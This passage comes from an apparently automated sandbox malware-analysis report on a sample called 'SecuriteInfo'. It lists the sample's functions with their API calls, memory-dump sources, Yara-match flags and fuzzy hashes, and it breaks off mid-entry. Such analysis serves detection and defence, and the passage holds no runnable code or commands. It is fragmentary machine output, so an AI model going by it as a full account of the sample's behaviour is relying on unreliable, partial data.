                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                              • _free.LIBCMT ref: 004184A7
                                                              • _free.LIBCMT ref: 004184C0
                                                              • _free.LIBCMT ref: 004184FE
                                                              • _free.LIBCMT ref: 00418507
                                                              • _free.LIBCMT ref: 00418513
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3291180501-0
                                                              • Opcode ID: 5c7b43d89d65a39910ed5fd65db01eea952a882e3af708f59d2cf6b7f1454f4d
                                                              • Instruction ID: 9616d8a6246681855122babaf8440f4712779bb404b18624a61a89f01e96d866
                                                              • Opcode Fuzzy Hash: 5c7b43d89d65a39910ed5fd65db01eea952a882e3af708f59d2cf6b7f1454f4d
                                                              • Instruction Fuzzy Hash: 69B14975A0161A9BDB24DF15C884AEEB3B5FB08304F5445AEE849A7350EB34AED0CF48
                                                              Function 1000A5DD Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                                              • __alloca_probe_16.LIBCMT ref: 1000A736
                                                              • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                                              • __freea.LIBCMT ref: 1000A837
                                                              • __freea.LIBCMT ref: 1000A843
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: __alloca_probe_16__freea$Info
                                                              • String ID:
                                                              • API String ID: 2330168043-0
                                                              • Opcode ID: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                                              • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                                              • Opcode Fuzzy Hash: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                                              • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                                              Function 1000AFB7 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __alloca_probe_16.LIBCMT ref: 1000B03B
                                                              • __alloca_probe_16.LIBCMT ref: 1000B101
                                                              • __freea.LIBCMT ref: 1000B16D
                                                                • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                              • __freea.LIBCMT ref: 1000B176
                                                              • __freea.LIBCMT ref: 1000B199
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1423051803-0
                                                              • Opcode ID: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
                                                              • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                                              • Opcode Fuzzy Hash: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
                                                              • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                                              Function 02187F98 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 3033488037-0
                                                              • Opcode ID: bf325a0276ac7524d4f60471fb5fe8747a97fbc829fc97ca04c34618ab33ca25
                                                              • Instruction ID: 6e5c2fc36d4b4d4dc7154406c260d4dc9f26869045b60dbbe7e1a2f28969980c
                                                              • Opcode Fuzzy Hash: bf325a0276ac7524d4f60471fb5fe8747a97fbc829fc97ca04c34618ab33ca25
                                                              • Instruction Fuzzy Hash: 7E51C672A40309AFDB21EF29CCC1B6AB7F5EF44724B550669E805DB290E735E941CF80
                                                              Function 00417D31 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041A395: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                              • _free.LIBCMT ref: 00417E40
                                                              • _free.LIBCMT ref: 00417E57
                                                              • _free.LIBCMT ref: 00417E74
                                                              • _free.LIBCMT ref: 00417E8F
                                                              • _free.LIBCMT ref: 00417EA6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 3033488037-0
                                                              • Opcode ID: 796391581251b77269079763240f90f867541923407a82df9009afead37a043d
                                                              • Instruction ID: b09f1d80b9d524519e6a2af905cbdca403bfb98ecb25127e3a5e28922fcd0f4f
                                                              • Opcode Fuzzy Hash: 796391581251b77269079763240f90f867541923407a82df9009afead37a043d
                                                              • Instruction Fuzzy Hash: CA51A272A04308AFDB21DF2ADC81BEA77F5EF44714B14056EE805D7291E739DD818B98
                                                              Function 02173F87 Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0217400A
                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 02174056
                                                              • __Getctype.LIBCPMT ref: 0217406F
                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0217408B
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 02174120
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                              • String ID:
                                                              • API String ID: 1840309910-0
                                                              • Opcode ID: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                              • Instruction ID: 36709380e4d12ebd34b8bb1bc6232389f0bf2624df336492ff8715299c53ff6f
                                                              • Opcode Fuzzy Hash: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                              • Instruction Fuzzy Hash: 4D5153B1D402489FDF10DFE4D8447DEBBB8AF54714F14416AD819AB240EB75EA08CBA1
                                                              Function 02172BA7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 02172C4F
                                                              • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 02172C64
                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 02172C72
                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 02172C8D
                                                              • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 02172CAC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                                              • String ID:
                                                              • API String ID: 2509773233-0
                                                              • Opcode ID: 8ff13bd64c836a37172eabe9342752174e9479ef80da464201f40468a1b6010f
                                                              • Instruction ID: 1e0943c1e1a058aaeb2de35cc7342a56673f5afe7d55ed5c7c1a3290ecdfc3a3
                                                              • Opcode Fuzzy Hash: 8ff13bd64c836a37172eabe9342752174e9479ef80da464201f40468a1b6010f
                                                              • Instruction Fuzzy Hash: 6A313771B01008AFDB249F68CC40F6DB7B9EF88700F5541ADED05DB251CB31A906CB94
                                                              Function 10002986 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                                              • String ID:
                                                              • API String ID: 3136044242-0
                                                              • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                              • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                                              • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                              • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                                              Function 0218FE41 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 0218FE59
                                                                • Part of subcall function 0218994F: HeapFree.KERNEL32(00000000,00000000,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?), ref: 02189965
                                                                • Part of subcall function 0218994F: GetLastError.KERNEL32(?,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?,?), ref: 02189977
                                                              • _free.LIBCMT ref: 0218FE6B
                                                              • _free.LIBCMT ref: 0218FE7D
                                                              • _free.LIBCMT ref: 0218FE8F
                                                              • _free.LIBCMT ref: 0218FEA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 833792b777c6c03e8cf0aa346d63d203dbff7c932eedd85bdc8b2f7842ed42dd
                                                              • Instruction ID: 8d836d885f9cd50bd4cabe10a48626c2766be2602c930e09ab5a3e194e495163
                                                              • Opcode Fuzzy Hash: 833792b777c6c03e8cf0aa346d63d203dbff7c932eedd85bdc8b2f7842ed42dd
                                                              • Instruction Fuzzy Hash: 43F01273944205AFCA25FF64F4C5C2A73DAAB04B247A51815F48CD7B11C734F8818E64
                                                              Function 0041FBDA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 0041FBF2
                                                                • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                                • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                              • _free.LIBCMT ref: 0041FC04
                                                              • _free.LIBCMT ref: 0041FC16
                                                              • _free.LIBCMT ref: 0041FC28
                                                              • _free.LIBCMT ref: 0041FC3A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: f71149921f413fa43df794f6df76e54a2fab879d3f4956e12af54e0adfca1412
                                                              • Instruction ID: 1c7e9378ca95dd73cb2f75351d3b74d040f08b2e1626f4982a7efc7f0f8a2d9c
                                                              • Opcode Fuzzy Hash: f71149921f413fa43df794f6df76e54a2fab879d3f4956e12af54e0adfca1412
                                                              • Instruction Fuzzy Hash: 30F06873649108A78624DB55E585CCB73DDBB04310354081BF488D7701C738FCC19AAC
                                                              Function 02175F7B Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 378sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0217D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D37E
                                                                • Part of subcall function 0217D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D3BB
                                                              • __Init_thread_footer.LIBCMT ref: 02175FC2
                                                                • Part of subcall function 0217D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D333
                                                                • Part of subcall function 0217D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D366
                                                              • Sleep.KERNEL32(000007D0), ref: 02176340
                                                              • Sleep.KERNEL32(000007D0), ref: 0217635A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeaveSleep$Init_thread_footer
                                                              • String ID: updateSW
                                                              • API String ID: 500923978-2484434887
                                                              • Opcode ID: bd253d3c5d198e889332913f0522b8ddf46f9631c779f21dd1867174954e9587
                                                              • Instruction ID: 1a0750623637d378ec64a15f815363ec286c2ecffdb9a5da83e287f6f6ee9470
                                                              • Opcode Fuzzy Hash: bd253d3c5d198e889332913f0522b8ddf46f9631c779f21dd1867174954e9587
                                                              • Instruction Fuzzy Hash: EDD13671A401948FDF28DB24CC887ADBB76AFC5304F1441E9D819AB295DB359EC0CF91
                                                              Function 0217A227 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 021743B7: ___std_exception_copy.LIBVCRUNTIME ref: 02174446
                                                              • std::locale::_Init.LIBCPMT ref: 0217A335
                                                                • Part of subcall function 0217C77D: std::_Lockit::_Lockit.LIBCPMT ref: 0217C78F
                                                                • Part of subcall function 0217C77D: std::locale::_Setgloballocale.LIBCPMT ref: 0217C7AA
                                                                • Part of subcall function 0217C77D: _Yarn.LIBCPMT ref: 0217C7C0
                                                                • Part of subcall function 0217C77D: std::_Lockit::~_Lockit.LIBCPMT ref: 0217C800
                                                                • Part of subcall function 0217AE47: std::_Lockit::_Lockit.LIBCPMT ref: 0217AE7D
                                                                • Part of subcall function 0217AE47: std::_Lockit::_Lockit.LIBCPMT ref: 0217AEA0
                                                                • Part of subcall function 0217AE47: std::_Lockit::~_Lockit.LIBCPMT ref: 0217AEC0
                                                                • Part of subcall function 0217AE47: std::_Lockit::~_Lockit.LIBCPMT ref: 0217AF3A
                                                              • std::locale::_Init.LIBCPMT ref: 0217A3F8
                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 0217A50F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_std::locale::_$Init$Concurrency::cancel_current_taskSetgloballocaleYarn___std_exception_copy
                                                              • String ID: X:C
                                                              • API String ID: 569503877-1469212745
                                                              • Opcode ID: 217f668ab1de721d73fda48ba94b0dbc39f4964a2ce04ccc1313e00a63b23f01
                                                              • Instruction ID: a8b2bd6022ed7d597394bdfb6ffa9891f386abd577c1c5c2d3f79db6be564029
                                                              • Opcode Fuzzy Hash: 217f668ab1de721d73fda48ba94b0dbc39f4964a2ce04ccc1313e00a63b23f01
                                                              • Instruction Fuzzy Hash: 58A134B0A00205DFDB00CF54C498B9ABBF5FF49314F1582A9D8099F791D7BAAA48CF90
                                                              Function 0218EF36 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0218ECE0: GetOEMCP.KERNEL32(00000000,0218EF51,00000000,00000000,0218933A,0218933A,00000000,004280A0,00000000), ref: 0218ED0B
                                                              • _free.LIBCMT ref: 0218EFAE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: 0uC$xX}
                                                              • API String ID: 269201875-1490493339
                                                              • Opcode ID: efdb9210a3a48cac013b61cbf6915b30911a4848a99ba8911043eab9c7e55cc9
                                                              • Instruction ID: a30cf60cda408100a1b2c1be2f87c2da84ab97c848bf4c9e2b6aca2318933d50
                                                              • Opcode Fuzzy Hash: efdb9210a3a48cac013b61cbf6915b30911a4848a99ba8911043eab9c7e55cc9
                                                              • Instruction Fuzzy Hash: 9E319E72944209AFDB11EF68D8C0A9E77B6FF44324F15406AF9119B2A0EB329951CF50
                                                              Function 0041BE0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __alloca_probe_16.LIBCMT ref: 0041BE7F
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,0000FDE9), ref: 0041BEDC
                                                              • __freea.LIBCMT ref: 0041BEE5
                                                                • Part of subcall function 0041A395: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeapStringType__alloca_probe_16__freea
                                                              • String ID: uA
                                                              • API String ID: 2035984020-3888042258
                                                              • Opcode ID: 7155a43ec1d6933e7fe47e47275e285a3df6f51680ee3be0c486694057325eca
                                                              • Instruction ID: 8ad0d2bb7cf9ccb20e4a1086eca39ddb9b037eee8af06865313e927ef5ed8ba2
                                                              • Opcode Fuzzy Hash: 7155a43ec1d6933e7fe47e47275e285a3df6f51680ee3be0c486694057325eca
                                                              • Instruction Fuzzy Hash: E631AF7290021AABDB219F65CC41EEF7BB9EF84714F05412AFD14A7291D7388D91CBE8
                                                              Function 021743B7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 02174446
                                                                • Part of subcall function 0217E5FA: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,02171344,?,0217C52C,?,00435218,?,?,?,?,02171344,00438E00,00438E01), ref: 0217E65A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionRaise___std_exception_copy
                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                              • API String ID: 3109751735-1866435925
                                                              • Opcode ID: 620105460546bc7a548feef953e988388133d47a47cf20a4bd6377840e9f9762
                                                              • Instruction ID: 547506d24311fd201a1574230b38a1586a6c54769e795465aa50bc31311e2dc2
                                                              • Opcode Fuzzy Hash: 620105460546bc7a548feef953e988388133d47a47cf20a4bd6377840e9f9762
                                                              • Instruction Fuzzy Hash: 461103B1640708AFC314DF18D801B9AB7F8EF94311F14C66BE9A98B640EB74E954CF95
                                                              Function 00404150 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 004041DF
                                                                • Part of subcall function 0040E393: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,004010DD,?,0040C2C5,?,00435218,?,?,?,?,004010DD,00438E00,00438E01), ref: 0040E3F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise___std_exception_copy
                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                              • API String ID: 3109751735-1866435925
                                                              • Opcode ID: 9681fa31f44d55695c752986d1b18a626e2cd7d4e58cff6f511573f18fceb534
                                                              • Instruction ID: 13cacc8724f6aa836e6ba3b181d95373929fba2349835315f28fc814294e7515
                                                              • Opcode Fuzzy Hash: 9681fa31f44d55695c752986d1b18a626e2cd7d4e58cff6f511573f18fceb534
                                                              • Instruction Fuzzy Hash: 6911D2F1600704ABC310DE69C802B96B7E8AF94311F14C63FFA54AB681E778E954CB99
                                                              Function 0218A560 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,0218A48E,?,00435740,0000000C,0218A540,?,?,?), ref: 0218A5B6
                                                              • GetLastError.KERNEL32(?,0218A48E,?,00435740,0000000C,0218A540,?,?,?), ref: 0218A5C0
                                                              • __dosmaperr.LIBCMT ref: 0218A5EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                              • String ID: pJ}
                                                              • API String ID: 2583163307-2408717132
                                                              • Opcode ID: 3d3b4c2842199103c75513f23e81b55a792dc1ed9b11700af9073ac6edc07654
                                                              • Instruction ID: 9716df4adfdbf38cb0310ef8b6a28bbddcf64e966fd2774f24e9ad63a581355b
                                                              • Opcode Fuzzy Hash: 3d3b4c2842199103c75513f23e81b55a792dc1ed9b11700af9073ac6edc07654
                                                              • Instruction Fuzzy Hash: 40010832A812642BC6253634A9C4B6E7BCA4F82774F69021BE9189B5D1DF7094C28D90
                                                              Function 0041A2F9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,0041A227,?,00435740,0000000C,0041A2D9,?,?,?), ref: 0041A34F
                                                              • GetLastError.KERNEL32(?,0041A227,?,00435740,0000000C,0041A2D9,?,?,?), ref: 0041A359
                                                              • __dosmaperr.LIBCMT ref: 0041A384
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                              • String ID: pJ}
                                                              • API String ID: 2583163307-2408717132
                                                              • Opcode ID: 3d3b4c2842199103c75513f23e81b55a792dc1ed9b11700af9073ac6edc07654
                                                              • Instruction ID: 0b799059b0a43453b96ace0e8b2508c320fbc9ad1b7c337ec9ecfb27cefc63c8
                                                              • Opcode Fuzzy Hash: 3d3b4c2842199103c75513f23e81b55a792dc1ed9b11700af9073ac6edc07654
                                                              • Instruction Fuzzy Hash: DA014C3260611806C22112359805BFE67894BC1B78F25026FFD28873D1DB398CD7419E
                                                              Function 0218AA06 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strrchr
                                                              • String ID:
                                                              • API String ID: 3213747228-0
                                                              • Opcode ID: 4ae5112772388eae5d59444569f6d0a61886308d2200cae73a5f5cb9bdd6ce13
                                                              • Instruction ID: 3c03e8c3fff333636f0a434630df476bb9fb3aaab277edf390a4ae5a471bfe0c
                                                              • Opcode Fuzzy Hash: 4ae5112772388eae5d59444569f6d0a61886308d2200cae73a5f5cb9bdd6ce13
                                                              • Instruction Fuzzy Hash: 9DB155729802899FDB25EF28C8C0BEEBBE6EF45304F1541ABE955AB341D3349941CF60
                                                              Function 0041A79F Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _strrchr
                                                              • String ID:
                                                              • API String ID: 3213747228-0
                                                              • Opcode ID: 4ae5112772388eae5d59444569f6d0a61886308d2200cae73a5f5cb9bdd6ce13
                                                              • Instruction ID: 8ec614d2e68f5847cdab36d5c1b166ed75c8c05dfdab0d31a35a8bf3d15cb102
                                                              • Opcode Fuzzy Hash: 4ae5112772388eae5d59444569f6d0a61886308d2200cae73a5f5cb9bdd6ce13
